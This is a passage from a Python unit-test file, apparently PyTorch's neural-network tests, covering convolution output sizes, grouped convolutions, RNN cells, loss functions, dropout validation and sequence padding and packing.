test(True, nn.Conv2d(1, 1, (3, 3)).to(dtype), (1, 2, 2), dtype)
test(False, nn.Conv2d(1, 1, (3, 3)).to(dtype), (1, 3, 3), dtype)
test(False, nn.Conv2d(1, 1, (3, 3), padding=1).to(dtype), (1, 2, 2), dtype)
# Conv3D
test(True, nn.Conv3d(1, 1, (3, 3, 3)).to(dtype), (1, 2, 2, 2), dtype)
test(False, nn.Conv3d(1, 1, (3, 3, 3)).to(dtype), (1, 3, 3, 3), dtype)
test(False, nn.Conv3d(1, 1, (3, 3, 3), padding=1).to(dtype), (1, 2, 2, 2), dtype)
def test_ConvTranspose2d_output_size(self):
m = nn.ConvTranspose2d(3, 4, 3, 3, 0, 2)
i = torch.randn(2, 3, 6, 6)
for h in range(15, 22):
for w in range(15, 22):
if 18 <= h <= 20 and 18 <= w <= 20:
output = m(i, output_size=(h, w))
self.assertEqual(output.size()[2:], (h, w))
else:
self.assertRaises(ValueError, lambda: m(i, (h, w)))
def test_ConvTranspose2d_output_size_downsample_upsample(self):
b, c, hid_c = 2, 3, 2
for h in range(13, 24):
for w in range(13, 17):
for k in range(2, 5):
for d in range(1, 5):
for s in range(1, 4):
for p in range(3):
conv = nn.Conv2d(
in_channels=c,
out_channels=hid_c,
kernel_size=k,
stride=s,
padding=p,
dilation=d,
)
t_conv = nn.ConvTranspose2d(
in_channels=hid_c,
out_channels=c,
kernel_size=k,
stride=s,
padding=p,
dilation=d,
)
i = torch.randn(b, c, h, w)
out = t_conv(conv(i), output_size=i.shape)
self.assertEqual(out.size()[2:], i.size()[2:])
def test_ConvTranspose3d_correct_output_size(self):
# Check that ConvTranspose3d can take a 5d output_size.
m = nn.ConvTranspose3d(2, 2, 2)
i = torch.rand(1, 2, 1, 1, 1)
out = m(i, output_size=(1, 2, 2, 2, 2))
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_ConvTranspose2d_half_cublas_gemm(self):
with torch.backends.cudnn.flags(enabled=False):
inputs = torch.randn(1, 1, 16, 16, device='cuda', dtype=torch.half)
deconv = nn.ConvTranspose2d(
1, 1, 3, stride=2, padding=1, output_padding=1).cuda().half()
output = deconv(inputs)
output.mean().backward()
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@repeat_test_for_types([torch.half, torch.float])
def test_ConvTranspose2d_large_output_padding(self, dtype=torch.half):
net1 = torch.nn.ConvTranspose2d(128, 64, kernel_size=3, stride=2, padding=1, output_padding=1)\
.to(device='cuda', dtype=dtype)
net2 = torch.nn.ConvTranspose2d(64, 32, kernel_size=3, stride=2, padding=1, output_padding=1)\
.to(device='cuda', dtype=dtype)
net3 = torch.nn.ConvTranspose2d(32, 3, kernel_size=3, stride=2, padding=1, output_padding=1)\
.to(device='cuda', dtype=dtype)
x = torch.rand(1, 128, 6, 6, device='cuda', dtype=dtype, requires_grad=True)
x = net1(x)
x = net2(x)
x = net3(x)
x.backward(torch.randn_like(x))
torch.cuda.synchronize()
# For https://github.com/pytorch/pytorch/pull/1273
# Almost identical to the above `test_Conv2d_naive_groups`
@skipIfRocm
def test_Conv2d_groups_nobias(self):
dev_dtypes = [("cpu", torch.float)]
if TEST_CUDA:
dev_dtypes += [("cuda", torch.float), ("cuda", torch.half)]
if AMPERE_OR_ROCM:
dev_dtypes += [("cuda", torch.bfloat16)]
for device, dtype in dev_dtypes:
m = nn.Conv2d(4, 4, kernel_size=3, groups=2, bias=False).to(device, dtype)
i = torch.randn(2, 4, 6, 6, device=device, dtype=dtype, requires_grad=True)
output = m(i)
grad_output = torch.randn(2, 4, 4, 4, device=device, dtype=dtype)
output.backward(grad_output)
m1 = nn.Conv2d(2, 2, kernel_size=3, bias=False).to(device, dtype)
m1.weight.data.copy_(m.weight.data[:2])
i1 = i.data[:, :2].contiguous().requires_grad_(True)
output1 = m1(i1)
output1.backward(grad_output[:, :2].contiguous())
m2 = nn.Conv2d(2, 2, kernel_size=3, bias=False).to(device, dtype)
m2.weight.data.copy_(m.weight.data[2:])
i2 = i.data[:, 2:].contiguous().requires_grad_(True)
output2 = m2(i2)
output2.backward(grad_output[:, 2:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1))
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data, m2.weight.grad.data], 0),
atol=1e-1 if dtype == torch.half else dtype2prec_DONTUSE[dtype], rtol=0)
# Almost identical to the above `test_Conv2d_naive_groups`
# Covering special case when group > 1, input-channel / group < 16 and output-channel is multiple of 16
# See also https://github.com/pytorch/pytorch/pull/18463#issuecomment-476563686
# and https://github.com/pytorch/pytorch/pull/18463#issuecomment-477001024
@skipIfRocm
def test_Conv2d_groups_nobias_v2(self):
torch.manual_seed(123)
dev_dtypes = [("cpu", torch.float)]
if TEST_CUDA:
dev_dtypes += [("cuda", torch.float), ("cuda", torch.half)]
if AMPERE_OR_ROCM:
dev_dtypes += [("cuda", torch.bfloat16)]
for device, dtype in dev_dtypes:
m = nn.Conv2d(4, 16, kernel_size=3, groups=2, bias=False).to(device, dtype)
i = torch.randn(2, 4, 6, 6, device=device, dtype=dtype, requires_grad=True)
output = m(i)
grad_output = torch.randn(2, 16, 4, 4, device=device, dtype=dtype)
output.backward(grad_output)
m1 = nn.Conv2d(2, 8, kernel_size=3, bias=False).to(device, dtype)
m1.weight.data.copy_(m.weight.data[:8])
i1 = i.data[:, :2].contiguous().requires_grad_(True)
output1 = m1(i1)
output1.backward(grad_output[:, :8].contiguous())
m2 = nn.Conv2d(2, 8, kernel_size=3, bias=False).to(device, dtype)
m2.weight.data.copy_(m.weight.data[8:])
i2 = i.data[:, 2:].contiguous().requires_grad_(True)
output2 = m2(i2)
output2.backward(grad_output[:, 8:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1))
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data, m2.weight.grad.data], 0),
atol=1e-1 if dtype == torch.half else dtype2prec_DONTUSE[dtype], rtol=0)
# CPU-only test for group conv3d fast implementation using bmm
# See: https://github.com/pytorch/pytorch/pull/36355
def test_Conv3d_groups_nobias(self):
torch.manual_seed(123)
m = nn.Conv3d(4, 16, kernel_size=3, groups=2, bias=False).to("cpu", torch.float)
i = torch.randn(2, 4, 6, 6, 6, device="cpu", dtype=torch.float, requires_grad=True)
output = m(i)
grad_output = torch.randn(2, 16, 4, 4, 4, device="cpu", dtype=torch.float)
output.backward(grad_output)
m1 = nn.Conv3d(2, 8, kernel_size=3, bias=False).to("cpu", torch.float)
m1.weight.data.copy_(m.weight.data[:8])
i1 = i.data[:, :2].contiguous().requires_grad_(True)
output1 = m1(i1)
output1.backward(grad_output[:, :8].contiguous())
m2 = nn.Conv3d(2, 8, kernel_size=3, bias=False).to("cpu", torch.float)
m2.weight.data.copy_(m.weight.data[8:])
i2 = i.data[:, 2:].contiguous().requires_grad_(True)
output2 = m2(i2)
output2.backward(grad_output[:, 8:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1))
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[torch.float], rtol=0)
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data, m2.weight.grad.data], 0),
atol=dtype2prec_DONTUSE[torch.float], rtol=dtype2prec_DONTUSE[torch.float])
def test_Conv3d_groups_wbias(self):
torch.manual_seed(123)
m = nn.Conv3d(4, 16, kernel_size=3, groups=2, bias=True).to("cpu", torch.float)
i = torch.randn(2, 4, 6, 6, 6, device="cpu", dtype=torch.float, requires_grad=True)
output = m(i)
grad_output = torch.randn(2, 16, 4, 4, 4, device="cpu", dtype=torch.float)
output.backward(grad_output)
m1 = nn.Conv3d(2, 8, kernel_size=3, bias=True).to("cpu", torch.float)
m1.weight.data.copy_(m.weight.data[:8])
m1.bias.data.copy_(m.bias.data[:8])
i1 = i.data[:, :2].contiguous().requires_grad_(True)
output1 = m1(i1)
output1.backward(grad_output[:, :8].contiguous())
m2 = nn.Conv3d(2, 8, kernel_size=3, bias=True).to("cpu", torch.float)
m2.weight.data.copy_(m.weight.data[8:])
m2.bias.data.copy_(m.bias.data[8:])
i2 = i.data[:, 2:].contiguous().requires_grad_(True)
output2 = m2(i2)
output2.backward(grad_output[:, 8:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1))
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[torch.float],
rtol=dtype2prec_DONTUSE[torch.float])
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data, m2.weight.grad.data], 0),
atol=dtype2prec_DONTUSE[torch.float],
rtol=dtype2prec_DONTUSE[torch.float])
self.assertEqual(m.bias.grad.data,
torch.cat([m1.bias.grad.data, m2.bias.grad.data], 0),
atol=dtype2prec_DONTUSE[torch.float], rtol=dtype2prec_DONTUSE[torch.float])
# Very similar to test_Conv2d_naive_groups but with special care to handle
# the number of groups == number of input channels
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@repeat_test_for_types(ALL_TENSORTYPES)
@tf32_on_and_off(0.01)
def test_Conv2d_depthwise_naive_groups_cuda(self, dtype=torch.float):
for depth_multiplier in [1, 2]:
m = nn.Conv2d(2, 2 * depth_multiplier, kernel_size=3, groups=2).to("cuda", dtype)
i = torch.randn(2, 2, 6, 6, device="cuda", dtype=dtype).div_(2).requires_grad_()
output = m(i)
grad_output = torch.randn(2, 2 * depth_multiplier, 4, 4, device="cuda", dtype=dtype) / 2
output.backward(grad_output)
offset = 1 * depth_multiplier
m1 = nn.Conv2d(1, 1 * depth_multiplier, kernel_size=3).to("cuda", dtype)
m1.weight.data = m.weight.data[:offset].clone()
m1.bias.data = m.bias.data[:offset].clone()
i1 = i.detach()[:, :1].clone().requires_grad_()
output1 = m1(i1)
output1.backward(grad_output[:, :offset].contiguous())
m2 = nn.Conv2d(1, 1 * depth_multiplier, kernel_size=3).to("cuda", dtype)
m2.weight.data.copy_(m.weight.data[offset:])
m2.bias.data.copy_(m.bias.data[offset:])
i2 = i.detach()[:, 1:].clone().requires_grad_()
output2 = m2(i2)
output2.backward(grad_output[:, offset:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.bias.grad.data,
torch.cat([m1.bias.grad.data,
m2.bias.grad.data], 0),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data,
m2.weight.grad.data], 0),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@repeat_test_for_types(ALL_TENSORTYPES)
@tf32_on_and_off(0.005)
def test_Conv3d_depthwise_naive_groups_cuda(self, dtype=torch.float):
for depth_multiplier in [1, 2]:
m = nn.Conv3d(2, 2 * depth_multiplier, kernel_size=3, groups=2).to("cuda", dtype)
i = torch.randn(2, 2, 6, 6, 6, device="cuda", dtype=dtype).div_(2).requires_grad_()
output = m(i)
grad_output = torch.randn(2, 2 * depth_multiplier, 4, 4, 4, device="cuda", dtype=dtype) / 2
output.backward(grad_output)
offset = 1 * depth_multiplier
m1 = nn.Conv3d(1, 1 * depth_multiplier, kernel_size=3).to("cuda", dtype)
m1.weight.data = m.weight.data[:offset].clone()
m1.bias.data = m.bias.data[:offset].clone()
i1 = i.detach()[:, :1].clone().requires_grad_()
output1 = m1(i1)
output1.backward(grad_output[:, :offset].contiguous())
m2 = nn.Conv3d(1, 1 * depth_multiplier, kernel_size=3).to("cuda", dtype)
m2.weight.data.copy_(m.weight.data[offset:])
m2.bias.data.copy_(m.bias.data[offset:])
i2 = i.detach()[:, 1:].clone().requires_grad_()
output2 = m2(i2)
output2.backward(grad_output[:, offset:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.bias.grad.data,
torch.cat([m1.bias.grad.data,
m2.bias.grad.data], 0),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data,
m2.weight.grad.data], 0),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
def test_MaxUnpool2d_output_size(self):
m = nn.MaxPool2d(3, stride=2, return_indices=True)
mu = nn.MaxUnpool2d(3, stride=2)
big_t = torch.rand(1, 1, 6, 6)
big_t[0][0][4][4] = 100
output_big, indices_big = m(big_t)
self.assertRaises(RuntimeError, lambda: mu(output_big, indices_big))
small_t = torch.rand(1, 1, 5, 5)
for i in range(0, 4, 2):
for j in range(0, 4, 2):
small_t[:, :, i, j] = 100
output_small, indices_small = m(small_t)
for h in range(3, 10):
for w in range(3, 10):
if 4 <= h <= 6 and 4 <= w <= 6:
size = (h, w)
if h == 6:
size = (1, 1) + size
mu(output_small, indices_small, output_size=size)
else:
self.assertRaises(ValueError, lambda: mu(output_small, indices_small, (h, w)))
def test_max_unpool2d_nhwc_cpu(self):
input = torch.randn(2, 10, 9, 9).float().cpu()
input = input.contiguous(memory_format=torch.channels_last)
ref_input = input.clone().contiguous()
pool = nn.MaxPool2d(3, stride=2, return_indices=True).cpu()
ref_pool = nn.MaxPool2d(3, stride=2, return_indices=True).cpu()
out, ind = pool(input)
ref_out, ref_ind = ref_pool(ref_input)
out.requires_grad_()
ref_out.requires_grad_()
unpool = nn.MaxUnpool2d(3, stride=2).cpu()
ref_unpool = nn.MaxUnpool2d(3, stride=2).cpu()
upout = unpool(out, ind)
ref_upout = ref_unpool(ref_out, ref_ind)
grad = torch.randn(upout.size()).float().cpu()
grad = grad.contiguous(memory_format=torch.channels_last)
ref_grad = grad.clone().contiguous()
upout.backward(grad)
ref_upout.backward(ref_grad)
self.assertTrue(upout.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_upout.is_contiguous())
self.assertTrue(torch.allclose(upout, ref_upout))
self.assertTrue(torch.allclose(out.grad, ref_out.grad))
def test_container_copy(self):
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.linear = nn.Linear(4, 5)
def forward(self, input):
return self.linear(input)
input = torch.randn(2, 4)
model = Model()
model_cp = deepcopy(model)
self.assertEqual(model(input).data, model_cp(input).data)
model_cp.linear.weight.data[:] = 2
self.assertNotEqual(model(input).data, model_cp(input).data)
def test_RNN_cell(self):
# this is just a smoke test; these modules are implemented through
# autograd so no Jacobian test is needed
for module in (nn.RNNCell, nn.GRUCell):
for bias in (True, False):
input = torch.randn(3, 10)
hx = torch.randn(3, 20)
cell = module(10, 20, bias=bias)
for _ in range(6):
hx = cell(input, hx)
hx.sum().backward()
def test_RNN_cell_forward_input_size(self):
input = torch.randn(3, 11)
hx = torch.randn(3, 20)
for module in (nn.RNNCell, nn.GRUCell):
cell = module(10, 20)
self.assertRaises(Exception, lambda: cell(input, hx))
def test_RNN_cell_forward_hidden_size(self):
input = torch.randn(3, 10)
hx = torch.randn(3, 21)
cell_shared_param = (10, 20)
for cell in (nn.RNNCell(*cell_shared_param, nonlinearity="relu"),
nn.RNNCell(*cell_shared_param, nonlinearity="tanh"),
nn.GRUCell(*cell_shared_param)):
self.assertRaises(Exception, lambda: cell(input, hx))
def _test_loss_equal_input_target_shape(self, cast):
# Tests losses whose inputs should have the same size.
losses = {
'mse_loss': lambda x, y: F.mse_loss(x, y),
'l1_loss': lambda x, y: F.l1_loss(x, y),
'smooth_l1_loss': lambda x, y: F.smooth_l1_loss(x, y),
'huber_loss': lambda x, y: F.huber_loss(x, y),
'kl_div': lambda x, y: F.kl_div(x, y),
'poisson_nll_loss': lambda x, y: F.poisson_nll_loss(x, y),
}
input = cast(torch.randn(3, 5))
target = cast(torch.randn(5, 3))
for _name, fn in losses.items():
self.assertRaises(Exception, lambda: fn(input, target))
def test_loss_equal_input_target_shape(self):
self._test_loss_equal_input_target_shape(lambda x: x)
def test_mse_loss_size_warning(self):
i = torch.randn((10, 1), requires_grad=True)
t = torch.randn((10,))
with warnings.catch_warnings(record=True) as w:
# Ensure warnings are being shown
warnings.simplefilter("always")
# Trigger Warning
F.mse_loss(i, t)
# Check warning occurs
self.assertEqual(len(w), 1)
self.assertIn('Please ensure they have the same size.', str(w[0]))
def test_poisson_nll_loss_reduction_modes(self):
input = torch.tensor([0.5, 1.5, 2.5])
target = torch.tensor([1., 2., 3.])
component_wise_loss = torch.exp(input) - target * input
self.assertEqual(component_wise_loss,
F.poisson_nll_loss(input, target, reduction='none'))
self.assertEqual(torch.sum(component_wise_loss),
F.poisson_nll_loss(input, target, reduction='sum'))
self.assertEqual(torch.mean(component_wise_loss),
F.poisson_nll_loss(input, target, reduction='mean'))
with self.assertRaisesRegex(ValueError, 'is not valid'):
F.poisson_nll_loss(input, target, reduction='total')
def test_gaussian_nll_loss_reduction_modes(self):
input = torch.tensor([[0.5, 1.5, 2.5], [2., 4., 6.]])
target = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
var = torch.tensor([[0.5, 1., 1.5], [1., 1.5, 2.]])
component_wise_loss = 0.5 * (torch.log(var) + (input - target)**2 / var)
self.assertEqual(component_wise_loss,
F.gaussian_nll_loss(input, target, var, reduction='none'))
self.assertEqual(torch.sum(component_wise_loss),
F.gaussian_nll_loss(input, target, var, reduction='sum'))
self.assertEqual(torch.mean(component_wise_loss),
F.gaussian_nll_loss(input, target, var, reduction='mean'))
with self.assertRaisesRegex(ValueError, 'is not valid'):
F.gaussian_nll_loss(input, target, var, reduction='total')
def test_gaussian_nll_loss_broadcasting(self):
input = torch.tensor([[0.5, 1.5, 2.5], [2., 4., 6.]])
target_full = torch.tensor([[1., 2., 3.], [1., 2., 3.]])
target_part = torch.tensor([[1., 2., 3.]])
var_full = torch.tensor([[0.5, 0.5, 0.5], [1.5, 1.5, 1.5]])
var_part1 = torch.tensor([[0.5], [1.5]])
var_part2 = torch.tensor([0.5, 1.5])
component_wise_loss = 0.5 * (torch.log(var_full) + (input - target_full)**2 / var_full)
self.assertEqual(component_wise_loss,
F.gaussian_nll_loss(input, target_part, var_full, reduction='none'))
self.assertEqual(component_wise_loss,
F.gaussian_nll_loss(input, target_full, var_part1, reduction='none'))
self.assertEqual(component_wise_loss,
F.gaussian_nll_loss(input, target_full, var_part2, reduction='none'))
self.assertEqual(component_wise_loss,
F.gaussian_nll_loss(input, target_part, var_part1, reduction='none'))
self.assertEqual(component_wise_loss,
F.gaussian_nll_loss(input, target_part, var_part2, reduction='none'))
def test_gaussian_nll_loss_args(self):
input = torch.randn(3, 5)
with self.assertRaisesRegex(ValueError, 'var is of incorrect size'):
target = torch.randn(3, 5)
var = torch.ones(3, 3)
torch.nn.functional.gaussian_nll_loss(input, target, var)
with self.assertRaisesRegex(ValueError, 'var has negative entry/entries'):
var = -1 * torch.ones(3, 5)
torch.nn.functional.gaussian_nll_loss(input, target, var)
def test_KLDivLoss_batch_mean(self):
input_shape = (2, 5)
log_prob1 = F.log_softmax(torch.randn(input_shape), 1)
prob2 = F.softmax(torch.randn(input_shape), 1)
loss = nn.KLDivLoss(reduction='batchmean')
l = loss(log_prob1, prob2)
loss_none_reduce = nn.KLDivLoss(reduction='sum')(log_prob1, prob2)
expected = loss_none_reduce / input_shape[0]
self.assertEqual(l, expected)
def test_KLDivLoss_batch_mean_log_target(self):
input_shape = (2, 5)
log_prob1 = F.log_softmax(torch.randn(input_shape), 1)
log_prob2 = F.log_softmax(torch.randn(input_shape), 1)
loss = nn.KLDivLoss(reduction='batchmean', log_target=True)
l = loss(log_prob1, log_prob2)
loss_none_reduce = nn.KLDivLoss(reduction='sum', log_target=True)(log_prob1, log_prob2)
expected = loss_none_reduce / input_shape[0]
self.assertEqual(l, expected)
def test_CTCLoss_typechecks(self):
target_lengths = torch.tensor([30, 25, 20])
input_lengths = torch.tensor([50, 50, 50])
targets = torch.randint(1, 15, (sum(target_lengths),), dtype=torch.int)
log_probs = torch.randn(50, 3, 15, dtype=torch.float).log_softmax(2)
with self.assertRaises(RuntimeError):
_input_lengths = input_lengths.to(dtype=torch.float)
torch.nn.functional.ctc_loss(log_probs, targets, _input_lengths, target_lengths)
with self.assertRaises(RuntimeError):
target_lengths = target_lengths.to(dtype=torch.float)
torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_CTCLoss_lengthchecks_cuda(self):
target_lengths = [30, 25, 20]
input_lengths = [50, 50, 50]
targets = torch.randint(1, 15, (3, 29), dtype=torch.long, device='cuda')
log_probs = torch.randn(50, 3, 15, dtype=torch.float, device='cuda').log_softmax(2)
with self.assertRaises(RuntimeError):
torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
def test_CTCLoss_lengthchecks_cpu(self):
target_lengths = [30, 25, 20]
input_lengths = [50, 50, 50]
targets = torch.randint(1, 15, (3, 29), dtype=torch.int)
log_probs = torch.randn(50, 3, 15, dtype=torch.float).log_softmax(2)
with self.assertRaises(RuntimeError):
torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_CTCLoss_long_targets(self):
input_length = 4000
vocab_size = 3
batch_size = 4
target_length = 1200
log_probs = torch.randn(input_length, batch_size, vocab_size).log_softmax(2).requires_grad_()
targets = torch.randint(low=1, high=vocab_size - 1, size=(batch_size, target_length), dtype=torch.long)
input_lengths = batch_size * [input_length]
target_lengths = batch_size * [target_length]
res_cpu = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths,
reduction='sum', zero_infinity=True)
grad_out = torch.randn_like(res_cpu)
grad_cpu, = torch.autograd.grad(res_cpu, log_probs, grad_out)
with torch.backends.cudnn.flags(enabled=False):
res_gpu = torch.nn.functional.ctc_loss(log_probs.cuda(), targets.cuda(), input_lengths, target_lengths,
reduction='sum', zero_infinity=True)
grad_gpu, = torch.autograd.grad(res_gpu, log_probs, grad_out.cuda())
self.assertEqual(res_cpu, res_gpu, atol=1e-4, rtol=0)
self.assertEqual(grad_cpu, grad_gpu, atol=1e-4, rtol=0)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_CTCLoss_critical_target_len(self):
# cudnn has an unexpected problem with target length 256, see issue #53505
N = 1
S = 256
C = 10
T = 500
target = torch.randint(low=1, high=C, size=(S,), dtype=torch.int)
input_lengths = torch.full(size=(N,), fill_value=T, dtype=torch.int)
target_lengths = torch.tensor(S, dtype=torch.int)
inp = torch.randn(T, N, C, dtype=torch.float, device='cuda').log_softmax(2).requires_grad_()
with cudnn.flags(enabled=True):
res_gpu = torch.nn.functional.ctc_loss(inp, target, input_lengths, target_lengths, reduction='none')
res_cpu = torch.nn.functional.ctc_loss(inp.cpu(), target, input_lengths, target_lengths, reduction='none')
self.assertEqual(res_cpu, res_gpu, atol=1e-3, rtol=0)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_CTCLoss_zero_infinity(self):
target_lengths = [60, 25, 20]
input_lengths = [50, 50, 50]
targets = torch.randint(1, 15, (sum(target_lengths),), dtype=torch.int, device='cuda')
log_probs = torch.randn(50, 3, 15, dtype=torch.float, device='cuda').log_softmax(2).requires_grad_()
res = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths,
reduction='sum', zero_infinity=True)
with torch.backends.cudnn.flags(enabled=False):
res2 = torch.nn.functional.ctc_loss(log_probs, targets.cuda().long(), input_lengths, target_lengths,
reduction='sum', zero_infinity=True)
res_cpu = torch.nn.functional.ctc_loss(log_probs.cpu(), targets.cpu(), input_lengths, target_lengths,
reduction='sum', zero_infinity=True)
self.assertEqual(res2, res, atol=1e-4, rtol=0)
self.assertEqual(res_cpu, res.cpu(), atol=1e-4, rtol=0)
g1, = torch.autograd.grad(res, log_probs)
g2, = torch.autograd.grad(res2, log_probs)
g3, = torch.autograd.grad(res_cpu, log_probs)
self.assertEqual(g2, g3, atol=1e-4, rtol=0)
self.assertEqual(g1, g2, atol=1e-4, rtol=0)
self.assertTrue((g1 == g1).all().item()) # check that we don't have NaN
def test_RNN_cell_no_broadcasting(self):
def test(cell_module, input, hx, input_size, hidden_size):
cell = cell_module(input_size, hidden_size)
self.assertRaises(RuntimeError, lambda: cell(input, hx))
def test_all(hidden_size, bad_hx, good_hx, input_size, input):
test(nn.RNNCell, input, bad_hx, input_size, hidden_size)
test(nn.GRUCell, input, bad_hx, input_size, hidden_size)
test(nn.LSTMCell, input, (bad_hx, good_hx), input_size, hidden_size)
test(nn.LSTMCell, input, (good_hx, bad_hx), input_size, hidden_size)
hidden_size = 20
input_size = 10
input = torch.randn(3, input_size)
bad_hx = torch.randn(1, hidden_size)
good_hx = torch.randn(3, hidden_size)
# Test hidden/input batch size broadcasting
test_all(hidden_size, bad_hx, good_hx, input_size, input)
# Test hx's hidden_size vs module's hidden_size broadcasting
bad_hx = torch.randn(3, 1)
test_all(hidden_size, bad_hx, good_hx, input_size, input)
# Test input's input_size vs module's input_size broadcasting
bad_input = torch.randn(3, 1)
test_all(hidden_size, good_hx, good_hx, input_size, bad_input)
def test_invalid_dropout_p(self):
v = torch.ones(1)
self.assertRaises(ValueError, lambda: nn.Dropout(-0.1))
self.assertRaises(ValueError, lambda: nn.Dropout(1.1))
self.assertRaises(ValueError, lambda: nn.Dropout2d(-0.1))
self.assertRaises(ValueError, lambda: nn.Dropout2d(1.1))
self.assertRaises(ValueError, lambda: nn.Dropout3d(-0.1))
self.assertRaises(ValueError, lambda: nn.Dropout3d(1.1))
self.assertRaises(ValueError, lambda: F.dropout(v, -0.1))
self.assertRaises(ValueError, lambda: F.dropout(v, 1.1))
def test_pad_sequence(self):
def pad(tensor, length):
return torch.cat(
[tensor.data, tensor.data.new(
length - tensor.size(0), *tensor.size()[1:]).zero_()])
# single dimensional
a = torch.tensor([1, 2, 3])
b = torch.tensor([4, 5])
c = torch.tensor([6])
# batch_first = true
expected = torch.tensor([[4, 5, 0], [1, 2, 3], [6, 0, 0]])
padded = rnn_utils.pad_sequence([b, a, c], True)
self.assertEqual(padded, expected)
# batch_first = false
padded = rnn_utils.pad_sequence([b, a, c])
self.assertEqual(padded, expected.transpose(0, 1))
# pad with non-zero value
expected = torch.tensor([[4, 5, 1], [1, 2, 3], [6, 1, 1]])
padded = rnn_utils.pad_sequence([b, a, c], True, 1)
self.assertEqual(padded, expected)
# Test pad sorted sequence
expected = torch.tensor([[1, 2, 3], [4, 5, 0], [6, 0, 0]])
padded = rnn_utils.pad_sequence([a, b, c], True)
self.assertEqual(padded, expected)
# more dimensions
maxlen = 9
for num_dim in (0, 1, 2, 3):
sequences = []
trailing_dims = [4] * num_dim
for i in range(1, maxlen + 1):
seq_len = i * i
sequences.append(torch.rand(seq_len, 5, *trailing_dims))
random.shuffle(sequences)
expected = []
for seq in sequences:
expected.append(pad(seq, maxlen * maxlen))
# batch first = true
expected = torch.stack(expected)
padded = rnn_utils.pad_sequence(sequences, True)
self.assertEqual(padded, expected)
# batch first = false
padded = rnn_utils.pad_sequence(sequences)
self.assertEqual(padded, expected.transpose(0, 1))
def test_pack_sequence(self):
def _compatibility_test(sequences, lengths, batch_first, enforce_sorted=False):
padded = rnn_utils.pad_sequence(sequences, batch_first)
packed = rnn_utils.pack_sequence(sequences, enforce_sorted)
unpacked = rnn_utils.pad_packed_sequence(packed, batch_first)
self.assertEqual(padded, unpacked[0])
pack_padded = rnn_utils.pack_padded_sequence(
padded, lengths, batch_first, enforce_sorted)
self.assertEqual(packed, pack_padded)
# single dimensional
a = torch.tensor([1, 2, 3])
b = torch.tensor([4, 5])
c = torch.tensor([6])
packed = rnn_utils.pack_sequence([a, b, c], enforce_sorted=False)
expected = torch.tensor([1, 4, 6, 2, 5, 3])
self.assertEqual(packed.batch_sizes, [3, 2, 1])
self.assertEqual(packed.data.data, expected)
self.assertEqual(packed.sorted_indices, [0, 1, 2])
self.assertEqual(packed.unsorted_indices, [0, 1, 2])
packed_unsorted = rnn_utils.pack_sequence([b, c, a], enforce_sorted=False)
self.assertEqual(packed_unsorted.batch_sizes, [3, 2, 1])
self.assertEqual(packed_unsorted.data.data, expected)
self.assertEqual(packed_unsorted.sorted_indices, [2, 0, 1])
self.assertEqual(packed_unsorted.unsorted_indices, [1, 2, 0])
# single dimensional, enforce_sorted = True
packed_enforce_sorted = rnn_utils.pack_sequence([a, b, c], enforce_sorted=True)
self.assertEqual(packed_enforce_sorted.batch_sizes, [3, 2, 1])
self.assertEqual(packed_enforce_sorted.data.data, expected)
self.assertTrue(packed_enforce_sorted.sorted_indices is None)
self.assertTrue(packed_enforce_sorted.unsorted_indices is None)
with self.assertRaisesRegex(RuntimeError, 'must be sorted in decreasing order'):
rnn_utils.pack_sequence([b, c, a], enforce_sorted=True)
with self.assertRaisesRegex(RuntimeError, 'You can pass `enforce_sorted=False`'):
rnn_utils.pack_sequence([b, c, a], enforce_sorted=True)
# more dimensions
maxlen = 9
for num_dim in (0, 1, 2, 3):
sequences = []
lengths = []
trailing_dims = [4] * num_dim
for i in range(maxlen, 0, -1):
seq_len = i * i
lengths.append(seq_len)
sequences.append(torch.rand(seq_len, 5, *trailing_dims))
unsorted_sequences = [s.clone() for s in sequences]
